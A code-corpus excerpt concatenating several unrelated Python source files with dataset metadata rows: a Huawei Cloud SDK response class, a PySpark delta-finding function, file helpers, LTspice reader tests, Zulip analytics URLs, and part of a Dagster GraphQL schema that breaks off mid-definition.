super(UntagDeviceResponse, self).__init__()
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
"""Gets the body of this UntagDeviceResponse.
:return: The body of this UntagDeviceResponse.
:rtype: str
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this UntagDeviceResponse.
:param body: The body of this UntagDeviceResponse.
:type: str
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UntagDeviceResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.39823 | 79 | 0.546095 |
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UntagDeviceResponse(SdkResponse):
sensitive_list = []
openapi_types = {
'body': 'str'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
super(UntagDeviceResponse, self).__init__()
self._body = None
self.discriminator = None
if body is not None:
self.body = body
@property
def body(self):
return self._body
@body.setter
def body(self, body):
self._body = body
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, UntagDeviceResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
1c4a68ab2bfe23ff9552b1c0fd938fc479058e3b | 3,557 | py | Python | blocks/find_delta/pyspark/lib.py | datayoga-io/datayoga | d88b23d21d49d60d14b3c72d54e11e5034f6c1f3 | [
"Apache-2.0"
] | 16 | 2022-01-24T07:45:16.000Z | 2022-03-07T08:27:13.000Z | blocks/find_delta/pyspark/lib.py | datayoga-io/datayoga | d88b23d21d49d60d14b3c72d54e11e5034f6c1f3 | [
"Apache-2.0"
] | null | null | null | blocks/find_delta/pyspark/lib.py | datayoga-io/datayoga | d88b23d21d49d60d14b3c72d54e11e5034f6c1f3 | [
"Apache-2.0"
] | 2 | 2022-01-19T07:46:16.000Z | 2022-01-24T12:25:09.000Z | import pyspark.sql
import pyspark.sql.functions as F
import pyspark.sql.types as T
import logging
import collections
from typing import List
import functools
import operator
logger = logging.getLogger("dy_runner")
Delta = collections.namedtuple('Delta', 'insert update delete exclude')
def find_delta(
df_existing,
df_incoming,
business_keys: List[str],
columns: List[str],
include_deletes: bool = False,
exclusion_condition: str = ""
):
join_condition = functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`") == F.col(f"existing.`{colname}`") for colname in business_keys
]
)
# check if we need to include deletes. these are more costly since need to scan entire existing set
join_type = "leftouter"
if include_deletes:
join_type = "fullouter"
_all_rows = df_incoming.alias("incoming").join(df_existing.alias("existing"), join_condition, join_type)
#
# inserts - ones that didn't match existing business keys
#
df_insert = _all_rows.filter(
functools.reduce(
operator.and_,
[
F.col(f"existing.`{colname}`").isNull() for colname in business_keys
]
)
).select("incoming.*")
#
# deletes
#
if include_deletes:
# deletes are ones that didn't match incoming business keys
df_delete = _all_rows.filter(
functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`").isNull() for colname in business_keys
]
)
).select("existing.*")
else:
df_delete = None
#
# updates - ones that matched all business keys
#
if exclusion_condition and exclusion_condition != "":
# if we received an exclusion condition, apply it here.
# this is used to exclude rows altogether to save another join with the source
_all_rows = _all_rows.filter(~F.expr(exclusion_condition))
df_exclude = _all_rows.filter(F.expr(exclusion_condition))
else:
df_exclude = None
df_update = _all_rows.filter(join_condition)
# check if there was any change vs existing. take only specified columns or all shared columns if not explicitly specified
if columns and columns != []:
shared_cols = list(set(map(str.lower, df_incoming.columns)).intersection(
map(str.lower, df_existing.columns)).intersection(map(str.lower, columns)))
else:
shared_cols = list(set(map(str.lower, df_incoming.columns)).intersection(map(str.lower, df_existing.columns)))
# fetch the IDs, then join again to get the full record that matched
original_columns = list(set(map(str.lower, shared_cols+business_keys)))
df_update_ids = df_update.select(
[F.col(f"incoming.{colname}") for colname in original_columns]
).exceptAll(df_update.select(
[F.col(f"existing.{colname}") for colname in original_columns]
))
join_condition_ids = functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`") == F.col(f"update_ids.`{colname}`") for colname in business_keys
]
)
# we join again to get the complete rows of the incoming records that have been updated
df_update = _all_rows.join(df_update_ids.alias("update_ids"), join_condition_ids, "inner").select("incoming.*")
return Delta(
insert=df_insert,
update=df_update,
delete=df_delete,
exclude=df_exclude
)
| 33.556604 | 126 | 0.648299 | import pyspark.sql
import pyspark.sql.functions as F
import pyspark.sql.types as T
import logging
import collections
from typing import List
import functools
import operator
logger = logging.getLogger("dy_runner")
Delta = collections.namedtuple('Delta', 'insert update delete exclude')
def find_delta(
df_existing,
df_incoming,
business_keys: List[str],
columns: List[str],
include_deletes: bool = False,
exclusion_condition: str = ""
):
join_condition = functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`") == F.col(f"existing.`{colname}`") for colname in business_keys
]
)
join_type = "leftouter"
if include_deletes:
join_type = "fullouter"
_all_rows = df_incoming.alias("incoming").join(df_existing.alias("existing"), join_condition, join_type)
#
df_insert = _all_rows.filter(
functools.reduce(
operator.and_,
[
F.col(f"existing.`{colname}`").isNull() for colname in business_keys
]
)
).select("incoming.*")
#
# deletes
#
if include_deletes:
# deletes are ones that didn't match incoming business keys
df_delete = _all_rows.filter(
functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`").isNull() for colname in business_keys
]
)
).select("existing.*")
else:
df_delete = None
if exclusion_condition and exclusion_condition != "":
_all_rows = _all_rows.filter(~F.expr(exclusion_condition))
df_exclude = _all_rows.filter(F.expr(exclusion_condition))
else:
df_exclude = None
df_update = _all_rows.filter(join_condition)
if columns and columns != []:
shared_cols = list(set(map(str.lower, df_incoming.columns)).intersection(
map(str.lower, df_existing.columns)).intersection(map(str.lower, columns)))
else:
shared_cols = list(set(map(str.lower, df_incoming.columns)).intersection(map(str.lower, df_existing.columns)))
original_columns = list(set(map(str.lower, shared_cols+business_keys)))
df_update_ids = df_update.select(
[F.col(f"incoming.{colname}") for colname in original_columns]
).exceptAll(df_update.select(
[F.col(f"existing.{colname}") for colname in original_columns]
))
join_condition_ids = functools.reduce(
operator.and_,
[
F.col(f"incoming.`{colname}`") == F.col(f"update_ids.`{colname}`") for colname in business_keys
]
)
df_update = _all_rows.join(df_update_ids.alias("update_ids"), join_condition_ids, "inner").select("incoming.*")
return Delta(
insert=df_insert,
update=df_update,
delete=df_delete,
exclude=df_exclude
)
| true | true |
1c4a68f1c5b6a23e89d1c5fd877e88f0987b2ccf | 2,069 | py | Python | common/utils.py | Spearis666/SARA | 99f4d70053faaf15c89bdb5a6ef6b624853b1f9f | [
"MIT"
] | null | null | null | common/utils.py | Spearis666/SARA | 99f4d70053faaf15c89bdb5a6ef6b624853b1f9f | [
"MIT"
] | null | null | null | common/utils.py | Spearis666/SARA | 99f4d70053faaf15c89bdb5a6ef6b624853b1f9f | [
"MIT"
] | null | null | null | import os, sys
# Check if folder exist, and try to create it if not
def checkFolder(path):
if os.path.exists(path):
return True
else:
try:
os.makedirs(path)
return True
except OSError:
return False
# List files in directory with specific extensions
def getFilesIn(directory, extensions, subdir=False):
filePaths = []
for root, directories, files in os.walk(directory):
if not subdir:
del(directories[:])
for filename in files:
for extension in extensions:
if filename.endswith(extension):
filepath = os.path.join(root, filename)
filePaths.append(filepath)
break
return filePaths
# Get script directory
def getScriptPath():
return os.path.dirname(os.path.realpath(sys.argv[0]))
# Return size of one or multiples files
def getSize(filesList):
totalSizeBytes = 0
for filePath in filesList:
totalSizeBytes += os.path.getsize(filePath)
return totalSizeBytes
# Make path relative (need to be relative for archiver retain
# directory structure, may be useful when it's a bunch of files/folder,
# like blueray/dvd)
def makeRelativePath(rootPath, filesList):
for i, _ in enumerate(filesList):
filesList[i] = filesList[i].replace(rootPath + "/", "")
return filesList
# The million dollar question ? YES or NO ? :p
def queryYesNo(question, default="no"):
valid = {"yes": True, "y": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
print(question + prompt)
choice = input("> ").lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
print("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
| 26.87013 | 71 | 0.61189 | import os, sys
def checkFolder(path):
if os.path.exists(path):
return True
else:
try:
os.makedirs(path)
return True
except OSError:
return False
def getFilesIn(directory, extensions, subdir=False):
filePaths = []
for root, directories, files in os.walk(directory):
if not subdir:
del(directories[:])
for filename in files:
for extension in extensions:
if filename.endswith(extension):
filepath = os.path.join(root, filename)
filePaths.append(filepath)
break
return filePaths
def getScriptPath():
return os.path.dirname(os.path.realpath(sys.argv[0]))
def getSize(filesList):
totalSizeBytes = 0
for filePath in filesList:
totalSizeBytes += os.path.getsize(filePath)
return totalSizeBytes
# like blueray/dvd)
def makeRelativePath(rootPath, filesList):
for i, _ in enumerate(filesList):
filesList[i] = filesList[i].replace(rootPath + "/", "")
return filesList
# The million dollar question ? YES or NO ? :p
def queryYesNo(question, default="no"):
valid = {"yes": True, "y": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
print(question + prompt)
choice = input("> ").lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
print("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
| true | true |
1c4a6920c0679fbb93d994ae2d9852889fe7d1aa | 2,118 | py | Python | tests/test_read_ltxt.py | l-johnston/toolbag | 1bd6ca61bfaf5856e5de320926d5593291e39e9c | [
"MIT"
] | null | null | null | tests/test_read_ltxt.py | l-johnston/toolbag | 1bd6ca61bfaf5856e5de320926d5593291e39e9c | [
"MIT"
] | null | null | null | tests/test_read_ltxt.py | l-johnston/toolbag | 1bd6ca61bfaf5856e5de320926d5593291e39e9c | [
"MIT"
] | null | null | null | """Test read_ltxt"""
from tempfile import TemporaryFile
from unyt import unyt_array
from unyt.testing import allclose_units
from toolbag import read_ltxt
# pylint: disable=missing-function-docstring
# pylint: disable=invalid-name
def test_time():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write("time\tV(out)\n0.0e+0\t1.0e+0\n1.0e+0\t2.0e+0")
file.seek(0)
data = read_ltxt(file)
assert data.header == "time\tV(out)"
assert data.legends == ["time", "V(out)"]
expected = unyt_array([0.0, 1.0], "s")
assert allclose_units(data.time, expected)
assert allclose_units(data["time"], expected)
assert allclose_units(data[0], expected)
expected = unyt_array([1.0, 2.0], "V")
assert allclose_units(data.V_out, expected)
assert allclose_units(data["V(out)"], expected)
assert allclose_units(data[1], expected)
def test_frequency_dBdeg():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write(
"""Freq.\tV(out)
0.0e+0\t(0.0e+0dB,0.0e+0°)
1.0e+0\t(-3.0e+0dB,-9.0e+1°)"""
)
file.seek(0)
data = read_ltxt(file)
assert data.header == "frequency\tV(out)"
expected = unyt_array([0.0, 1.0], "Hz")
assert allclose_units(data.frequency, expected)
expected = unyt_array([0.0, -3.0], "dB")
assert allclose_units(data.V_out[0], expected)
expected = unyt_array([0.0, -90.0], "degree")
assert allclose_units(data.V_out[1], expected)
def test_frequency_reim():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write(
"""Freq.\tV(out)
0.0e+0\t0.0e+0,0.0e+0
1.0e+0\t2.0e+0,3.0e+0"""
)
file.seek(0)
data = read_ltxt(file)
assert data.header == "frequency\tV(out)"
expected = unyt_array([0.0, 1.0], "Hz")
assert allclose_units(data.frequency, expected)
expected = unyt_array([0.0, 2.0], "V")
assert allclose_units(data.V_out[0], expected)
expected = unyt_array([0.0, 3.0], "V")
assert allclose_units(data.V_out[1], expected)
| 34.721311 | 66 | 0.626062 | from tempfile import TemporaryFile
from unyt import unyt_array
from unyt.testing import allclose_units
from toolbag import read_ltxt
def test_time():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write("time\tV(out)\n0.0e+0\t1.0e+0\n1.0e+0\t2.0e+0")
file.seek(0)
data = read_ltxt(file)
assert data.header == "time\tV(out)"
assert data.legends == ["time", "V(out)"]
expected = unyt_array([0.0, 1.0], "s")
assert allclose_units(data.time, expected)
assert allclose_units(data["time"], expected)
assert allclose_units(data[0], expected)
expected = unyt_array([1.0, 2.0], "V")
assert allclose_units(data.V_out, expected)
assert allclose_units(data["V(out)"], expected)
assert allclose_units(data[1], expected)
def test_frequency_dBdeg():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write(
"""Freq.\tV(out)
0.0e+0\t(0.0e+0dB,0.0e+0°)
1.0e+0\t(-3.0e+0dB,-9.0e+1°)"""
)
file.seek(0)
data = read_ltxt(file)
assert data.header == "frequency\tV(out)"
expected = unyt_array([0.0, 1.0], "Hz")
assert allclose_units(data.frequency, expected)
expected = unyt_array([0.0, -3.0], "dB")
assert allclose_units(data.V_out[0], expected)
expected = unyt_array([0.0, -90.0], "degree")
assert allclose_units(data.V_out[1], expected)
def test_frequency_reim():
with TemporaryFile(mode="w+t", encoding="utf-8") as file:
file.write(
"""Freq.\tV(out)
0.0e+0\t0.0e+0,0.0e+0
1.0e+0\t2.0e+0,3.0e+0"""
)
file.seek(0)
data = read_ltxt(file)
assert data.header == "frequency\tV(out)"
expected = unyt_array([0.0, 1.0], "Hz")
assert allclose_units(data.frequency, expected)
expected = unyt_array([0.0, 2.0], "V")
assert allclose_units(data.V_out[0], expected)
expected = unyt_array([0.0, 3.0], "V")
assert allclose_units(data.V_out[1], expected)
| true | true |
1c4a6a7fe13f1d334ea7b780e192d677da6eed5f | 570 | py | Python | textflow/model/__init__.py | ysenarath/textflow | ebb86cbedaf6ba7ed62a9f811a7d7d1818d938ac | [
"MIT"
] | 4 | 2020-12-10T19:38:15.000Z | 2021-08-02T02:00:46.000Z | textflow/model/__init__.py | ysenarath/textflow | ebb86cbedaf6ba7ed62a9f811a7d7d1818d938ac | [
"MIT"
] | 2 | 2021-01-08T18:35:04.000Z | 2021-02-07T04:25:56.000Z | textflow/model/__init__.py | ysenarath/textflow | ebb86cbedaf6ba7ed62a9f811a7d7d1818d938ac | [
"MIT"
] | 1 | 2021-04-04T19:21:40.000Z | 2021-04-04T19:21:40.000Z | """ Model """
from textflow.model.annotation import AnnotationSet, Annotation, AnnotationSpan
from textflow.model.dataset import Dataset, datasets
from textflow.model.document import Document
from textflow.model.label import Label
from textflow.model.estimator import estimators
from textflow.model.project import Project
from textflow.model.user import Assignment, User
__all__ = [
'Annotation',
'AnnotationSet',
'AnnotationSpan',
'Document',
'Project',
'Label',
'Assignment',
'User',
'Dataset',
'datasets',
'estimators',
]
| 24.782609 | 79 | 0.72807 | from textflow.model.annotation import AnnotationSet, Annotation, AnnotationSpan
from textflow.model.dataset import Dataset, datasets
from textflow.model.document import Document
from textflow.model.label import Label
from textflow.model.estimator import estimators
from textflow.model.project import Project
from textflow.model.user import Assignment, User
__all__ = [
'Annotation',
'AnnotationSet',
'AnnotationSpan',
'Document',
'Project',
'Label',
'Assignment',
'User',
'Dataset',
'datasets',
'estimators',
]
| true | true |
1c4a6aa6a00384fc6746c01b52b7972d18f38e00 | 679 | py | Python | src/leetcode/Coding_Interviews/number_of_1.py | highing666/leaving | c121ee2f61e45472bb71e2770d0697e902279a64 | [
"MIT"
] | null | null | null | src/leetcode/Coding_Interviews/number_of_1.py | highing666/leaving | c121ee2f61e45472bb71e2770d0697e902279a64 | [
"MIT"
] | null | null | null | src/leetcode/Coding_Interviews/number_of_1.py | highing666/leaving | c121ee2f61e45472bb71e2770d0697e902279a64 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
class Solution:
def countDigitOne(self, n: int) -> int:
digit, result = 1, 0
high, cur, low = n // 10, n % 10, 0
while high != 0 or cur != 0:
if cur == 0:
result += high * digit
elif cur == 1:
result += high * digit + low + 1
else:
result += (high + 1) * digit
low += cur * digit
cur = high % 10
high //= 10
digit *= 10
return result
if __name__ == "__main__":
solution = Solution()
test_num = 12344
print(solution.countDigitOne(test_num))
| 23.413793 | 48 | 0.427099 |
class Solution:
def countDigitOne(self, n: int) -> int:
digit, result = 1, 0
high, cur, low = n // 10, n % 10, 0
while high != 0 or cur != 0:
if cur == 0:
result += high * digit
elif cur == 1:
result += high * digit + low + 1
else:
result += (high + 1) * digit
low += cur * digit
cur = high % 10
high //= 10
digit *= 10
return result
if __name__ == "__main__":
solution = Solution()
test_num = 12344
print(solution.countDigitOne(test_num))
| true | true |
1c4a6b229d3ab0ade8a6a29420ac282ec48469e8 | 2,616 | py | Python | analytics/urls.py | fearless0307/zulip | 378d14af7ea73a9a83c7245706cd918bec5a37bf | [
"Apache-2.0"
] | 2 | 2019-04-24T15:22:52.000Z | 2020-01-18T11:01:31.000Z | analytics/urls.py | fearless0307/zulip | 378d14af7ea73a9a83c7245706cd918bec5a37bf | [
"Apache-2.0"
] | 10 | 2019-02-26T11:10:42.000Z | 2019-02-26T14:30:24.000Z | analytics/urls.py | fearless0307/zulip | 378d14af7ea73a9a83c7245706cd918bec5a37bf | [
"Apache-2.0"
] | 1 | 2020-01-07T15:49:54.000Z | 2020-01-07T15:49:54.000Z | from django.conf.urls import include, url
import analytics.views
from zerver.lib.rest import rest_dispatch
i18n_urlpatterns = [
# Server admin (user_profile.is_staff) visible stats pages
url(r'^activity$', analytics.views.get_activity,
name='analytics.views.get_activity'),
url(r'^realm_activity/(?P<realm_str>[\S]+)/$', analytics.views.get_realm_activity,
name='analytics.views.get_realm_activity'),
url(r'^user_activity/(?P<email>[\S]+)/$', analytics.views.get_user_activity,
name='analytics.views.get_user_activity'),
url(r'^stats/realm/(?P<realm_str>[\S]+)/$', analytics.views.stats_for_realm,
name='analytics.views.stats_for_realm'),
url(r'^stats/installation$', analytics.views.stats_for_installation,
name='analytics.views.stats_for_installation'),
url(r'^stats/remote/(?P<remote_server_id>[\S]+)/installation$',
analytics.views.stats_for_remote_installation,
name='analytics.views.stats_for_remote_installation'),
url(r'^stats/remote/(?P<remote_server_id>[\S]+)/realm/(?P<remote_realm_id>[\S]+)/$',
analytics.views.stats_for_remote_realm,
name='analytics.views.stats_for_remote_realm'),
# User-visible stats page
url(r'^stats$', analytics.views.stats,
name='analytics.views.stats'),
]
# These endpoints are a part of the API (V1), which uses:
# * REST verbs
# * Basic auth (username:password is email:apiKey)
# * Takes and returns json-formatted data
#
# See rest_dispatch in zerver.lib.rest for an explanation of auth methods used
#
# All of these paths are accessed by either a /json or /api prefix
v1_api_and_json_patterns = [
# get data for the graphs at /stats
url(r'^analytics/chart_data$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data'}),
url(r'^analytics/chart_data/realm/(?P<realm_str>[\S]+)$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_realm'}),
url(r'^analytics/chart_data/installation$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_installation'}),
url(r'^analytics/chart_data/remote/(?P<remote_server_id>[\S]+)/installation$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_remote_installation'}),
url(r'^analytics/chart_data/remote/(?P<remote_server_id>[\S]+)/realm/(?P<remote_realm_id>[\S]+)$',
rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_remote_realm'}),
]
i18n_urlpatterns += [
url(r'^api/v1/', include(v1_api_and_json_patterns)),
url(r'^json/', include(v1_api_and_json_patterns)),
]
urlpatterns = i18n_urlpatterns
| 43.6 | 102 | 0.706804 | from django.conf.urls import include, url
import analytics.views
from zerver.lib.rest import rest_dispatch
i18n_urlpatterns = [
url(r'^activity$', analytics.views.get_activity,
name='analytics.views.get_activity'),
url(r'^realm_activity/(?P<realm_str>[\S]+)/$', analytics.views.get_realm_activity,
name='analytics.views.get_realm_activity'),
url(r'^user_activity/(?P<email>[\S]+)/$', analytics.views.get_user_activity,
name='analytics.views.get_user_activity'),
url(r'^stats/realm/(?P<realm_str>[\S]+)/$', analytics.views.stats_for_realm,
name='analytics.views.stats_for_realm'),
url(r'^stats/installation$', analytics.views.stats_for_installation,
name='analytics.views.stats_for_installation'),
url(r'^stats/remote/(?P<remote_server_id>[\S]+)/installation$',
analytics.views.stats_for_remote_installation,
name='analytics.views.stats_for_remote_installation'),
url(r'^stats/remote/(?P<remote_server_id>[\S]+)/realm/(?P<remote_realm_id>[\S]+)/$',
analytics.views.stats_for_remote_realm,
name='analytics.views.stats_for_remote_realm'),
url(r'^stats$', analytics.views.stats,
name='analytics.views.stats'),
]
v1_api_and_json_patterns = [
url(r'^analytics/chart_data$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data'}),
url(r'^analytics/chart_data/realm/(?P<realm_str>[\S]+)$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_realm'}),
url(r'^analytics/chart_data/installation$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_installation'}),
url(r'^analytics/chart_data/remote/(?P<remote_server_id>[\S]+)/installation$', rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_remote_installation'}),
url(r'^analytics/chart_data/remote/(?P<remote_server_id>[\S]+)/realm/(?P<remote_realm_id>[\S]+)$',
rest_dispatch,
{'GET': 'analytics.views.get_chart_data_for_remote_realm'}),
]
i18n_urlpatterns += [
url(r'^api/v1/', include(v1_api_and_json_patterns)),
url(r'^json/', include(v1_api_and_json_patterns)),
]
urlpatterns = i18n_urlpatterns
| true | true |
1c4a6b3c9898b1cd500e1c9204c8490401f0ca8f | 18,701 | py | Python | python_modules/dagster-graphql/dagster_graphql/schema/roots/query.py | ibelikov/dagster | 6781eaadd33ecfb0b48d7c2c7d8e193efbda4209 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster-graphql/dagster_graphql/schema/roots/query.py | ibelikov/dagster | 6781eaadd33ecfb0b48d7c2c7d8e193efbda4209 | [
"Apache-2.0"
] | null | null | null | python_modules/dagster-graphql/dagster_graphql/schema/roots/query.py | ibelikov/dagster | 6781eaadd33ecfb0b48d7c2c7d8e193efbda4209 | [
"Apache-2.0"
] | 1 | 2021-11-25T11:06:39.000Z | 2021-11-25T11:06:39.000Z | import graphene
from dagster import check
from dagster.core.definitions.events import AssetKey
from dagster.core.execution.backfill import BulkActionStatus
from dagster.core.host_representation import (
InstigationSelector,
RepositorySelector,
ScheduleSelector,
SensorSelector,
)
from dagster.core.scheduler.instigation import InstigatorType
from ...implementation.external import fetch_repositories, fetch_repository, fetch_workspace
from ...implementation.fetch_assets import get_asset, get_asset_node, get_asset_nodes, get_assets
from ...implementation.fetch_backfills import get_backfill, get_backfills
from ...implementation.fetch_jobs import get_job_state_or_error, get_unloadable_job_states_or_error
from ...implementation.fetch_partition_sets import get_partition_set, get_partition_sets_or_error
from ...implementation.fetch_pipelines import (
get_pipeline_or_error,
get_pipeline_snapshot_or_error_from_pipeline_selector,
get_pipeline_snapshot_or_error_from_snapshot_id,
)
from ...implementation.fetch_runs import (
get_execution_plan,
get_run_by_id,
get_run_group,
get_run_groups,
get_run_tags,
validate_pipeline_config,
)
from ...implementation.fetch_schedules import (
get_schedule_or_error,
get_scheduler_or_error,
get_schedules_or_error,
)
from ...implementation.fetch_sensors import get_sensor_or_error, get_sensors_or_error
from ...implementation.fetch_solids import get_graph_or_error
from ...implementation.loader import BatchMaterializationLoader
from ...implementation.run_config_schema import resolve_run_config_schema_or_error
from ...implementation.utils import graph_selector_from_graphql, pipeline_selector_from_graphql
from ..asset_graph import GrapheneAssetNode, GrapheneAssetNodeOrError
from ..backfill import (
GrapheneBulkActionStatus,
GraphenePartitionBackfillOrError,
GraphenePartitionBackfillsOrError,
)
from ..external import (
GrapheneRepositoriesOrError,
GrapheneRepositoryOrError,
GrapheneWorkspaceOrError,
)
from ..inputs import (
GrapheneAssetKeyInput,
GrapheneGraphSelector,
GrapheneInstigationSelector,
GraphenePipelineSelector,
GrapheneRepositorySelector,
GrapheneRunsFilter,
GrapheneScheduleSelector,
GrapheneSensorSelector,
)
from ..instance import GrapheneInstance
from ..instigation import (
GrapheneInstigationStateOrError,
GrapheneInstigationStatesOrError,
GrapheneInstigationType,
)
from ..partition_sets import GraphenePartitionSetOrError, GraphenePartitionSetsOrError
from ..permissions import GraphenePermission
from ..pipelines.config_result import GraphenePipelineConfigValidationResult
from ..pipelines.pipeline import GrapheneRunOrError
from ..pipelines.snapshot import GraphenePipelineSnapshotOrError
from ..run_config import GrapheneRunConfigSchemaOrError
from ..runs import (
GrapheneRunConfigData,
GrapheneRunGroupOrError,
GrapheneRunGroupsOrError,
GrapheneRuns,
GrapheneRunsOrError,
parse_run_config_input,
)
from ..schedules import GrapheneScheduleOrError, GrapheneSchedulerOrError, GrapheneSchedulesOrError
from ..sensors import GrapheneSensorOrError, GrapheneSensorsOrError
from ..tags import GraphenePipelineTagAndValues
from ..util import non_null_list
from .assets import GrapheneAssetOrError, GrapheneAssetsOrError
from .execution_plan import GrapheneExecutionPlanOrError
from .pipeline import GrapheneGraphOrError, GraphenePipelineOrError
class GrapheneDagitQuery(graphene.ObjectType):
class Meta:
name = "DagitQuery"
version = graphene.NonNull(graphene.String)
repositoriesOrError = graphene.NonNull(GrapheneRepositoriesOrError)
repositoryOrError = graphene.Field(
graphene.NonNull(GrapheneRepositoryOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
workspaceOrError = graphene.NonNull(GrapheneWorkspaceOrError)
pipelineOrError = graphene.Field(
graphene.NonNull(GraphenePipelineOrError), params=graphene.NonNull(GraphenePipelineSelector)
)
pipelineSnapshotOrError = graphene.Field(
graphene.NonNull(GraphenePipelineSnapshotOrError),
snapshotId=graphene.String(),
activePipelineSelector=graphene.Argument(GraphenePipelineSelector),
)
graphOrError = graphene.Field(
graphene.NonNull(GrapheneGraphOrError),
selector=graphene.Argument(GrapheneGraphSelector),
)
scheduler = graphene.Field(graphene.NonNull(GrapheneSchedulerOrError))
scheduleOrError = graphene.Field(
graphene.NonNull(GrapheneScheduleOrError),
schedule_selector=graphene.NonNull(GrapheneScheduleSelector),
)
schedulesOrError = graphene.Field(
graphene.NonNull(GrapheneSchedulesOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
sensorOrError = graphene.Field(
graphene.NonNull(GrapheneSensorOrError),
sensorSelector=graphene.NonNull(GrapheneSensorSelector),
)
sensorsOrError = graphene.Field(
graphene.NonNull(GrapheneSensorsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
instigationStateOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStateOrError),
instigationSelector=graphene.NonNull(GrapheneInstigationSelector),
)
unloadableInstigationStatesOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStatesOrError),
instigationType=graphene.Argument(GrapheneInstigationType),
)
partitionSetsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
pipelineName=graphene.NonNull(graphene.String),
)
partitionSetOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
partitionSetName=graphene.String(),
)
pipelineRunsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
pipelineRunOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
runsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
runOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
pipelineRunTags = non_null_list(GraphenePipelineTagAndValues)
runGroupOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupOrError), runId=graphene.NonNull(graphene.ID)
)
runGroupsOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
isPipelineConfigValid = graphene.Field(
graphene.NonNull(GraphenePipelineConfigValidationResult),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
